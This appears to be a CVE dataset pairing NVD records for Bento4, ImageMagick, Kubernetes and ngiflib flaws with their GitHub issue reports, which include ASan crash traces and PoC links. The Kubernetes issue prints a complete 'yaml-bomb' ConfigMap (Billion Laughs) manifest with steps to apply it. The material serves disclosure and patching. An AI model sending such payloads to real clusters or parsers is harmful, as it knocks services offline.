AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #11 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #12 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #13 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #14 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #15 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #16 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #17 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #18 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #19 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #20 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #21 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #22 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #23 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #24 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #25 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #26 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #27 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #28 0x43f769 in main /src/bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350 #29 0x7f160934782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #30 0x4434e8 in _start (/src/aflbuild/installed/bin/mp4dump+0x4434e8) 0x611000009d76 is located 0 bytes to the right of 246-byte region [0x611000009c80,0x611000009d76) allocated by thread T0 here: #0 0x7f1609d226b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) #1 0x536f2f in AP4_DataBuffer::ReallocateBuffer(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x536f2f in AP4_DataBuffer::SetDataSize(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/bento4/Source/C++/Core/Ap4Atom.cpp:974 AP4_PrintInspector::AddField(char const*, unsigned char const*, unsigned int, AP4_AtomInspector::FormatHint) Shadow bytes around the buggy address: 0x0c227fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff93a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[06]fa 0x0c227fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff93c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff93d0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c227fff93e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff93f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==4107==ABORTING ``` ### others from fuzz project pwd-bento4-mp4dump-02 crash name pwd-bento4-mp4dump-02-00000029-20190811.mp4 Auto-generated by pyspider at 2019-08-11 11:06:47 please send email to [email protected] if you have any questions. [poc2.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640452/poc2.tar.gz)
A heap-buffer-overflow was discoverad in AP4_PrintInspector::AddField at Ap4Atom.cpp-974
https://api.github.com/repos/axiomatic-systems/Bento4/issues/431/comments
0
2019-09-23T02:19:02Z
2019-10-08T05:15:57Z
https://github.com/axiomatic-systems/Bento4/issues/431
496,867,352
431
CVE-2019-17541
2019-10-14T02:15:10.703
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15827" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/39f226a9c137f547e12afde972eeba7551124493" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/compare/7.0.8-54...7.0.8-55" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1641" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "FB264CB7-AFF2-45C4-A12E-9C65BD7DDD76", "versionEndExcluding": "6.9.10-55", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "6B173DFB-D070-44D6-BE3F-772BF990E3A9", "versionEndExcluding": "7.0.8-55", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1641
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/string.c:853 in DestroyStringInfo. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://github.com/007Alice/crashes/raw/master/ImageMagick_crash_0) run command: ./magick convert poc /dev/null ``` ==29840==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000af68 at pc 0x7f9e79581fab bp 0x7fff303409f0 sp 0x7fff303409e0 READ of size 8 at 0x60400000af68 thread T0 #0 0x7f9e79581faa in DestroyStringInfo MagickCore/string.c:853 #1 0x7f9e7985ebaf in ReadJPEGImage coders/jpeg.c:1198 #2 0x7f9e7929dbba in ReadImage MagickCore/constitute.c:547 #3 0x7f9e7929fde0 in ReadImages MagickCore/constitute.c:917 #4 0x7f9e78aab965 in ConvertImageCommand MagickWand/convert.c:617 #5 0x7f9e78c3d9a6 in MagickCommandGenesis MagickWand/mogrify.c:185 #6 0x4017d1 in MagickMain utilities/magick.c:149 #7 0x4019b2 in main utilities/magick.c:180 #8 0x7f9e783c982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x4012e8 in _start (/home/ImageMagick/utilities/.libs/lt-magick+0x4012e8) 0x60400000af68 is located 24 bytes inside of 40-byte region [0x60400000af50,0x60400000af78) freed by thread T0 here: #0 0x7f9e79ed42ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f9e7945cfac in RelinquishMagickMemory MagickCore/memory.c:1074 #2 0x7f9e7958216e in DestroyStringInfo MagickCore/string.c:862 #3 0x7f9e7985b93c in ReadICCProfile coders/jpeg.c:570 #4 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) previously allocated by thread T0 here: #0 0x7f9e79ed4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f9e7945c056 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x7f9e7957fb60 in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x7f9e7957ff57 in AcquireStringInfoContainer MagickCore/string.c:181 #4 0x7f9e7958029d in BlobToStringInfo MagickCore/string.c:236 #5 0x7f9e7985b7ec in ReadICCProfile coders/jpeg.c:549 #6 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 #4 0x7f9e78aab965 in ConvertImageCommand MagickWand/convert.c:617 #5 0x7f9e78c3d9a6 in MagickCommandGenesis MagickWand/mogrify.c:185 #6 0x4017d1 in MagickMain utilities/magick.c:149 #7 0x4019b2 in main utilities/magick.c:180 #8 0x7f9e783c982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x4012e8 in _start (/home/ImageMagick/utilities/.libs/lt-magick+0x4012e8) 0x60400000af68 is located 24 bytes inside of 40-byte region [0x60400000af50,0x60400000af78) freed by thread T0 here: #0 0x7f9e79ed42ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f9e7945cfac in RelinquishMagickMemory MagickCore/memory.c:1074 #2 0x7f9e7958216e in DestroyStringInfo MagickCore/string.c:862 #3 0x7f9e7985b93c in ReadICCProfile coders/jpeg.c:570 #4 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) previously allocated by thread T0 here: #0 0x7f9e79ed4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f9e7945c056 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x7f9e7957fb60 in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x7f9e7957ff57 in AcquireStringInfoContainer MagickCore/string.c:181 #4 0x7f9e7958029d in BlobToStringInfo MagickCore/string.c:236 #5 0x7f9e7985b7ec in ReadICCProfile coders/jpeg.c:549 #6 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9620: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 fa 0x0c087fff9630: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==29840==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-54 Q16 x86_64 2019-07-18 https://imagemagick.org Copyright: © 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.0) Delegates (built-in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/string.c:853 in DestroyStringInfo
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1641/comments
2
2019-07-18T09:43:55Z
2020-01-15T10:53:24Z
https://github.com/ImageMagick/ImageMagick/issues/1641
469,671,879
1,641
CVE-2019-11253
2019-10-17T16:15:10.443
Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3239" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3811" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3905" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/83253" }, { "source": "[email protected]", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/jk8polzSUxs" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20191031-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F0820894-56B7-4CB8-AE5C-29639FA59718", "versionEndExcluding": null, "versionEndIncluding": "1.12.10", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9FF055F3-E11D-41DB-9ED7-434D9ED905B4", "versionEndExcluding": "1.13.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "ADA3952E-8133-4E6A-A365-4FD74ABA962C", "versionEndExcluding": "1.14.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.14.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9F7837F-DA69-453E-8B24-1EDF0A5CAB4C", "versionEndExcluding": "1.15.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "E1BDF819-871C-4E34-978F-BAFF8D895B84", "versionEndExcluding": "1.16.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.9:*:*:*:*:*:*:*", "matchCriteriaId": "309CB6F8-F178-454C-BE97-787F78647C28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*", "matchCriteriaId": "4DBCD38F-BBE8-488C-A8C3-5782F191D915", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/83253
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 ([CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)). Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy. **Affected versions:** * Kubernetes v1.0.0-1.12.x * Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by https://github.com/kubernetes/kubernetes/pull/83436 * Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by https://github.com/kubernetes/kubernetes/pull/83435 * Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by https://github.com/kubernetes/kubernetes/pull/83434 * Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by https://github.com/kubernetes/kubernetes/pull/83433 All four patch releases are now available. Fixed in master by #83261 **Mitigation:** Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability. To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the [attached file](https://github.com/kubernetes/kubernetes/files/3735508/rbac.yaml.txt) as `rbac.yaml`, and run: ```sh kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions ``` **Note: this removes the ability for unauthenticated users to use `kubectl auth can-i`** If you are running a version prior to v1.14.0: * in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false ``` * after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true ``` ============= **Original description follows:** **Introduction** Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question [here](https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/58133282#58133282) **What happened**: When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a ["Billion Laughs" attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. ``` apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default ``` **What you expected to happen**: Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in `kube-apiserver` but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side. **How to reproduce it (as minimally and precisely as possible)**: Get the manifest above and apply to a cluster as normal with `kubectl create -f <manifest>`. Use `top` or another CPU monitor to observe the quantity of CPU time used. **Anything else we need to know?**: **Environment**: - Kubernetes version (use `kubectl version`): **test 1** (linux AMD64 client, Kubeadm cluster running in kind) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"} ``` **test 2** (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} ```
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack
https://api.github.com/repos/kubernetes/kubernetes/issues/83253/comments
17
2019-09-27T16:53:31Z
2022-10-14T02:09:16Z
https://github.com/kubernetes/kubernetes/issues/83253
499,548,171
83,253
CVE-2019-19011
2019-11-17T18:15:10.987
MiniUPnP ngiflib 0.4 has a NULL pointer dereference in GifIndexToTrueColor in ngiflib.c via a file that lacks a palette.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/miniupnp/ngiflib/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ngiflib_project:ngiflib:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "EEFD7EDE-41CD-4646-BBC8-6500AFC1985E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/miniupnp/ngiflib/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
